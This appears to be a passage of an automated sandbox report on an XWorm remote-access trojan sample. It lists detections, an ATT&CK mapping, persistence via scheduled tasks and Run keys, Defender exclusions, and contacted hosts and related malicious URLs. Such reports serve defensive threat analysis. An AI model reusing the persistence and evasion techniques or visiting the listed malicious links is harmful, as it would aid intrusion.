                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeQueries volume information: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeQueries volume information: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeQueries volume information: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeQueries volume information: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe VolumeInformation
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.19.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: TJXpRilNkh.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.TJXpRilNkh.exe.5f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TJXpRilNkh.exe PID: 5236, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: TJXpRilNkh.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.TJXpRilNkh.exe.5f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TJXpRilNkh.exe PID: 5236, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping111
                  Security Software Discovery                  		Remote Services11
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell                  		21
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		11
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		21
                  Registry Run Keys / Startup Folder                  		31
                  Virtualization/Sandbox Evasion                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading                  		11
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Obfuscated Files or Information                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546353 Sample: TJXpRilNkh.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 43 i.ibb.co 2->43 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 8 other signatures 2->53 8 TJXpRilNkh.exe 15 8 2->8         started        13 TJXpRilNkh.exe 2->13         started        15 TJXpRilNkh.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 45 i.ibb.co 169.197.85.95, 443, 49844, 49850 PUREVOLTAGE-INCUS United States 8->45 37 C:\Users\user\AppData\...\TJXpRilNkh.exe, PE32 8->37 dropped 57 Protects its processes via BreakOnTermination flag 8->57 59 Bypasses PowerShell execution policy 8->59 61 Uses schtasks.exe or at.exe to add and modify task schedules 8->61 63 Adds a directory exclusion to Windows Defender 8->63 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 39 C:\Users\user\AppData\...\TJXpRilNkh.exe.log, CSV 13->39 dropped 65 Antivirus detection for dropped file 13->65 67 Multi AV Scanner detection for dropped file 13->67 69 Machine Learning detection for dropped file 13->69 file6 signatures7 process8 file9 55 Loading BitLocker PowerShell Module 19->55 29 conhost.exe 19->29         started        31 conhost.exe 22->31         started        33 conhost.exe 24->33         started        41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 26->41 dropped 35 conhost.exe 26->35         started        signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  TJXpRilNkh.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                  TJXpRilNkh.exe100%AviraTR/Spy.Gen
                  TJXpRilNkh.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\TJXpRilNkh.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Roaming\TJXpRilNkh.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\TJXpRilNkh.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://crl.microsoft0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://crl.v0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  i.ibb.co
                  		169.197.85.95
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://i.ibb.co/Dwrj41N/Image.pngfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2091422935.000002609006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2179209701.000001939006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://i.ibb.coTJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002932000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002851000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.00000000028B8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://i.ibb.coTJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.00000000028C0000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2364715103.00000236FA732000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2068363016.000002608022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.microsoftTJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2364715103.00000236FA732000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2068363016.000002608022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2091422935.000002609006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2179209701.000001939006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.microsoft.coTJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://upx.sf.netAmcache.hve.19.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2068363016.0000026080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E1FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2068363016.0000026080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E1FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://crl.vTJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B4C6000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2364715103.00000236FA732000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                169.197.85.95
                                		i.ibb.coUnited States
                                		26548PUREVOLTAGE-INCUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1546353
                                Start date and time:2024-10-31 19:56:06 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:20
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Critical Process Termination
                                Sample name:TJXpRilNkh.exe
                                renamed because original name is a hash value
                                Original Sample Name:2aebedd83903b137349f36ffb767c5ddfaa5aa0168b980203895546fe71f2103.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@18/22@1/1
                                EGA Information:
                                • Successful, ratio: 12.5%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 75
                                • Number of non-executed functions: 3
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target TJXpRilNkh.exe, PID 1680 because it is empty
                                • Execution Graph export aborted for target TJXpRilNkh.exe, PID 2604 because it is empty
                                • Execution Graph export aborted for target TJXpRilNkh.exe, PID 5512 because it is empty
                                • Execution Graph export aborted for target TJXpRilNkh.exe, PID 5976 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 4464 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 6572 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7112 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: TJXpRilNkh.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                14:56:57API Interceptor50x Sleep call for process: powershell.exe modified
                                14:57:34API Interceptor1440959x Sleep call for process: TJXpRilNkh.exe modified
                                19:57:32Task SchedulerRun new task: TJXpRilNkh path: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                19:57:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TJXpRilNkh C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                19:57:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TJXpRilNkh C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                19:57:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TJXpRilNkh.lnk

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                169.197.85.95https://inspyrehomedesign.comGet hashmaliciousNetSupport RATBrowse
                                  https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                    index.htmlGet hashmaliciousUnknownBrowse
                                      index.htmlGet hashmaliciousUnknownBrowse
                                        r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                          https://meaoee-fc3f.elamzioehr.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                            https://oaemk-f29f.hmnaitswiaa.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                              http://pub-0b94d4f0b06646c5bbfca320d917c04a.r2.dev/insured.htmlGet hashmaliciousHTMLPhisherBrowse
                                                https://en-io-trezor-docs.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                  https://upholzds_logiaz.godaddysites.com/Get hashmaliciousUnknownBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    i.ibb.cohttps://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                    • 162.19.58.159
                                                    https://inspyrehomedesign.comGet hashmaliciousNetSupport RATBrowse
                                                    • 169.197.85.95
                                                    https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                    • 162.19.58.157
                                                    http://www.holidaybunch.comGet hashmaliciousUnknownBrowse
                                                    • 162.19.58.161
                                                    http://holidaybunch.com/Get hashmaliciousUnknownBrowse
                                                    • 162.19.58.158
                                                    http://holidaybunch.comGet hashmaliciousUnknownBrowse
                                                    • 162.19.58.159
                                                    http://holidaybunch.comGet hashmaliciousUnknownBrowse
                                                    • 104.194.8.184
                                                    http://holidaybunch.comGet hashmaliciousNetSupport RATBrowse
                                                    • 162.19.58.157
                                                    index.htmlGet hashmaliciousUnknownBrowse
                                                    • 162.19.58.156
                                                    index.htmlGet hashmaliciousUnknownBrowse
                                                    • 162.19.58.159

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    PUREVOLTAGE-INCUShttps://inspyrehomedesign.comGet hashmaliciousNetSupport RATBrowse
                                                    • 169.197.85.95
                                                    https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                    • 169.197.85.95
                                                    index.htmlGet hashmaliciousUnknownBrowse
                                                    • 169.197.85.95
                                                    index.htmlGet hashmaliciousUnknownBrowse
                                                    • 169.197.85.95
                                                    r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                                    • 169.197.85.95
                                                    https://ducati-mlbb.shop/Get hashmaliciousHTMLPhisherBrowse
                                                    • 162.249.168.129
                                                    https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                    • 104.244.159.148
                                                    https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                    • 104.244.159.148
                                                    https://email.mail.dlce.cc/c/eJxMkLGu2zAMAL_G2mRQNC1Kg4Yu-Y2AIqVGqGMbiVEgf18E6PDWwy13cp73YSVRDhYW8CxonpTJZ4rdQ9UYrUIyTM5KFJUUXSuBMVHOKaF7FCSt2iWzJIldM2sUaYtGUuMY1I2CgBQAckhrQJwXaMl6YrPQE1OYCJ4yttk2bbOq28rjus73tPya8Dbh7T-f8NarqGnFgFVrXXABZlsl59aBFNjtxzX6ULnGsX_LslFvHbJfexZPvaGXwOwRgXo1Ya7szk0-7fXVrcUaU1g8AKknhOqTZvWAUcHSWiOxe5Wx92MiqPI55fWnj_dj7L9nPZ7u3Xa7X-P541Fwfwv-CwAA__-Ag2laGet hashmaliciousUnknownBrowse
                                                    • 104.244.159.148
                                                    https://meaoee-fc3f.elamzioehr.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                    • 169.197.85.95

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eIM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                    • 169.197.85.95
                                                    1bE8S5sN9S.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 169.197.85.95
                                                    http://amtso.eicar.org/PotentiallyUnwanted.exeGet hashmaliciousUnknownBrowse
                                                    • 169.197.85.95
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                    • 169.197.85.95
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 169.197.85.95
                                                    Lana_Rhoades_Photoos.jsGet hashmaliciousUnknownBrowse
                                                    • 169.197.85.95
                                                    rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 169.197.85.95
                                                    https://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                    • 169.197.85.95
                                                    Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                    • 169.197.85.95
                                                    https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                                    • 169.197.85.95

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TJXpRilNkh.exe_7798d0edf58a88474c55bd682fcb8233a8db919a_0fb3adf6_f232989f-0a90-4f63-b4c9-acad96803681\Report.wer

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):1.373894015695639
                                                    Encrypted:false
                                                    SSDEEP:192:w4iTmabn30SthZauz8iyXzG6lnLtzuiF/Z24lO8/4Gw:wuabnESthZaQ8iQHLtzuiF/Y4lO8/Jw
                                                    MD5:3AC7D5ED2A7A76B071FFBD2777E96E44
                                                    SHA1:CF2CDDDF76B3C78319941690F14D28FB57721645
                                                    SHA-256:1E0690AB912D201EAE443B5EE5B0C927AEBFF6FF80568DF53764B411ABA4FD55
                                                    SHA-512:1B2B02C63A404CB9E93E221D2B15BBA851C6738E20AE61832EC24B94096C442E7B1E57216F02B5185B676106E2269A8552AD7EF9C8A131FBC2009486901930BF
                                                    Malicious:true
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.8.7.4.7.6.3.7.1.3.2.9.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.3.2.9.8.9.f.-.0.a.9.0.-.4.f.6.3.-.b.4.c.9.-.a.c.a.d.9.6.8.0.3.6.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.6.a.0.d.5.f.-.5.8.a.1.-.4.8.e.8.-.a.f.3.e.-.9.1.c.9.9.7.0.8.6.6.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.T.J.X.p.R.i.l.N.k.h...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.i.z.C.l.i.e.n.t.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.7.4.-.0.0.0.1.-.0.0.1.4.-.8.6.3.8.-.e.4.a.6.c.6.2.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.f.4.1.c.3.0.b.b.7.6.b.7.1.b.7.4.7.9.e.4.e.7.0.3.b.3.d.c.2.c.e.0.0.0.0.0.0.0.0.!.0.0.0.0.a.6.c.2.2.3.2.d.0.4.3.7.6.c.b.e.0.c.e.7.5.a.c.0.9.b.d.7.d.8.6.4.7.7.b.4.a.5.d.a.!.T.J.X.p.R.i.l.N.k.h...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.3.1.:.0.3.:.2.0.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER443E.tmp.dmp

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Mini DuMP crash report, 16 streams, Thu Oct 31 18:59:24 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):662905
                                                    Entropy (8bit):3.365199794337464
                                                    Encrypted:false
                                                    SSDEEP:6144:LqkV+Dq13I2KMVV+Zq66OmqqSSlmbCRRnl3Qogv5ngL9mQc3gwpke:GkV9xVsBmqq3Qogv5no9mQ6gwpk
                                                    MD5:E0455EF83F9BA07D48ABA155115E6CBD
                                                    SHA1:B8671F6E5F72B108BD729F50DABDAA9183A02565
                                                    SHA-256:420F678B73E3F9E735351B86E7D321F1138AFB63D72DF147E10B4C2E8D95E192
                                                    SHA-512:58E7FEFE745A631DE71A3938DB4F5791D15A86DDD9FF2100A916E175FFD4D3BAA7D6FCF050A35EC5DEFE46BBBD72BF3290AAB0C8B0946FA8025DEA3D57B2E1A5
                                                    Malicious:false
